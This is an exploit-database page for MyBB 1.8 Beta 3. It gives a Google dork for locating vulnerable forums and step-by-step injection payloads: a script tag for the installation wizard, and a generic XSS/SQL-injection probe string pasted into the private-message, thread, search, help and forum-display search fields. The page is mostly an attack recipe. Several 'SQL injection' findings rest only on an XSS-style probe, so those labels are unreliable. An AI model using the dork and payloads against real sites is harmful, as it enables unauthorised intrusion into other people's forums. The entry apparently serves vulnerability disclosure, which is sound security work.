[] NeoSense
E X P L O I T S
title author type platform port cve id

MyBB 1.8 Beta 3 - Multiple Vulnerabilities

Author: DemoLisH B3yaZ
type: webapps
platform: php
port: 
date_added: 2014-08-21 
date_updated: 2014-08-21 
verified: 1 
codes: OSVDB-110227;OSVDB-110226;OSVDB-110225;OSVDB-110224;OSVDB-110223;OSVDB-110222 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt34500/screen-shot-2014-08-21-at-094431.png 
application_url: http://www.exploit-db.comMyBB1.8Beta3.zip
# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.


b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:localhost/private.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


c) SQL Injection in Showthread
Go to -> Show Thread, for example:localhost/showthread.php?tid=1
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


d) SQL Injection in Search
Go to -> Search, for example:localhost/search.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


e) SQL Injection in Help Documents
Go to -> Help Documents, for example:localhost/misc.php?action=help
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


f) SQL Injection in Forum Display
Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

***************************************************
[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.